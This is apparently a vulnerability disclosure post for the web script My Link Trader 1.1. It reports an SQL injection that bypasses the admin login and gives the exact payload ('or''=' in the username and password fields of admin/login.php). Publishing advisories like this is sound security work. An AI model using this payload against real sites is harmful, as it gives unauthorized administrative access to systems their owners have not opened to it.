My Link Trader 1.1 SQL Injection

My Link Trader version 1.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass.


MD5 | b4a48b05ad78052eb7ae17bdfb37819b

# # # # # 
# Vulnerability:: Admin Login Bypass & SQLi
# Date:09.01.2017
# Vendor Homepage: http://software.friendsinwar.com/
# Script Name: My Link Trader
# Script Version: v1.1
# Script DL: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=13
# Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# http://localhost/[PATH]/admin/login.php and set Username and Password to 'or''=' and hit enter.
# # # # #


Related Posts